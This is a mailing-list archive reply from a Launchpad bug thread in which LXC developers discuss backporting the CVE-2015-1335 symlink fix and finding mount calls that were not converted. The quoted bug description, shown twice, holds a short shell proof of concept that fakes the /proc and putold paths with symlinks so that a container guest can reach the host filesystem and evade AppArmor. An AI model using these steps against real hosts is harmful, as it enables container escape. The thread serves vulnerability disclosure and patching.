← Back to team overview

touch-packages team mailing list archive

Re: [Bug 1476662] Re: lxc-start symlink vulnerabilities may allow guest to read host filesystem, interfere with apparmor

 

Quoting Mike Gabriel (mike.gabriel@xxxxxxxxxxxxxxxxxxx):
> Hi Serge,
> 
> sorry for getting back to this so late.
> 
> On  Di 08 Dez 2015 17:08:58 CET, Serge Hallyn wrote:
> 
> > Quoting Mike Gabriel (mike.gabriel@xxxxxxxxxxxxxxxxxxx):
> 
> >> today I worked on backporting available fixes for CVE-2015-1335 to LXC
> >> 0.7.x (as found in Debian squeeze-lts).
> >>
> >> The patch is attached, I am still in the testing-for-regressions phase.
> >> Can any of the LXC devs take a look at the patch and maybe see if it is
> >> suitable for Ubuntu 12.04, as well?
> >
> > Hi,
> >
> > So the thing to look for is any unconverted "mount" calls.  It
> > looks like the lxc_setup_fs() calls to mount_fs() are not being
> > protected.  So the contianer admin could attack through a /proc
> > symlink.
> 
> Hmmm... ok...
> 
> I just checked upstream Git and the location you refer to is not using  
> safe_mount either there [1]

Huh, that's odd.  Yes those should be protected, since /proc etc in
the container could be symlinks.  Do you mind sending a patch?

> Furthermore, it seems non-trivial to inform safe_mount about the root  
> path from within lxc_init.c.
> 
> Do you have any input on the following questions?:
> 
>    o Why mount_fs() in latest HEAD still using the mount() call  
> instead of safe_mount()?
>    o How could one pipe the rootfs path into lxc_setup_fs() -> mount_fs()?

You shouldn't need to - it's just '/' because you're already chrooted
there.

> Thanks for any input.
> 
> Mike
> 
> [1] https://github.com/lxc/lxc/blob/master/src/lxc/initutils.c#L35
> -- 
> 
> DAS-NETZWERKTEAM
> mike gabriel, herweg 7, 24357 fleckeby
> fon: +49 (1520) 1976 148
> 
> GnuPG Key ID 0x25771B31
> mail: mike.gabriel@xxxxxxxxxxxxxxxxxxx, http://das-netzwerkteam.de
> 
> freeBusy:
> https://mail.das-netzwerkteam.de/mailxchange/kronolith/fb.php?u=m.gabriel%40das-netzwerkteam.de
> 
> -- 
> You received this bug notification because you are subscribed to the bug
> report.
> Matching subscriptions: lxc
> https://bugs.launchpad.net/bugs/1476662
> 
> Title:
>   lxc-start symlink vulnerabilities may allow guest to read host
>   filesystem, interfere with apparmor
> 
> Status in lxc package in Ubuntu:
>   Fix Released
> 
> Bug description:
>   lxc-start shuffles around mounts using helper directory
>   /usr/lib/x86_64-linux-gnu/lxc (guest root fs is mounted here)
> 
>   It then modifies mounts operating in guest root directory before
>   invoking init. As it does not check if all mount points are
>   directories, a malicious guest may modify its internal structure
>   before shutdown (or was created using manipulated image) and then when
>   started again, guest may
> 
>   * Access  the whole host root filesystem
> 
>   * Block switching from lxc-start apparmor profile to lxc-container-
>   default
> 
>   
>   # Real putold before pivot-root (root fs will end here)
>   mkdir -p /x/lxc_putold
> 
>   # Faked putold
>   ln -s /usr/lib/x86_64-linux-gnu/lxc/x/lxc_putold lxc_putold
>   mkdir -p /usr/lib/x86_64-linux-gnu/lxc/x/lxc_putold/proc
>   touch /usr/lib/x86_64-linux-gnu/lxc/x/lxc_putold/proc/mounts
> 
>   
>   # proc fake
>   mkdir -p /x/proc
>   umount /proc
>   rmdir /proc
>   ln -s /usr/lib/x86_64-linux-gnu/lxc/x/proc proc
> 
>   mkdir -p /usr/lib/x86_64-linux-gnu/lxc/x/proc/1/attr /usr/lib/x86_64-linux-gnu/lxc/x/proc/self
>   touch /usr/lib/x86_64-linux-gnu/lxc/x/proc/1/attr/current
>   touch /usr/lib/x86_64-linux-gnu/lxc/x/proc/self/status
> 
> 
>   The  issue was also found during
>   https://service.ait.ac.at/security/2015/LxcSecurityAnalysis.html
> 
> To manage notifications about this bug go to:
> https://bugs.launchpad.net/ubuntu/+source/lxc/+bug/1476662/+subscriptions

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to lxc in Ubuntu.
https://bugs.launchpad.net/bugs/1476662

Title:
  lxc-start symlink vulnerabilities may allow guest to read host
  filesystem, interfere with apparmor

Status in lxc package in Ubuntu:
  Fix Released

Bug description:
  lxc-start shuffles around mounts using helper directory
  /usr/lib/x86_64-linux-gnu/lxc (guest root fs is mounted here)

  It then modifies mounts operating in guest root directory before
  invoking init. As it does not check if all mount points are
  directories, a malicious guest may modify its internal structure
  before shutdown (or was created using manipulated image) and then when
  started again, guest may

  * Access  the whole host root filesystem

  * Block switching from lxc-start apparmor profile to lxc-container-
  default

  
  # Real putold before pivot-root (root fs will end here)
  mkdir -p /x/lxc_putold

  # Faked putold
  ln -s /usr/lib/x86_64-linux-gnu/lxc/x/lxc_putold lxc_putold
  mkdir -p /usr/lib/x86_64-linux-gnu/lxc/x/lxc_putold/proc
  touch /usr/lib/x86_64-linux-gnu/lxc/x/lxc_putold/proc/mounts

  
  # proc fake
  mkdir -p /x/proc
  umount /proc
  rmdir /proc
  ln -s /usr/lib/x86_64-linux-gnu/lxc/x/proc proc

  mkdir -p /usr/lib/x86_64-linux-gnu/lxc/x/proc/1/attr /usr/lib/x86_64-linux-gnu/lxc/x/proc/self
  touch /usr/lib/x86_64-linux-gnu/lxc/x/proc/1/attr/current
  touch /usr/lib/x86_64-linux-gnu/lxc/x/proc/self/status


  The  issue was also found during
  https://service.ait.ac.at/security/2015/LxcSecurityAnalysis.html

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/lxc/+bug/1476662/+subscriptions


Follow ups

References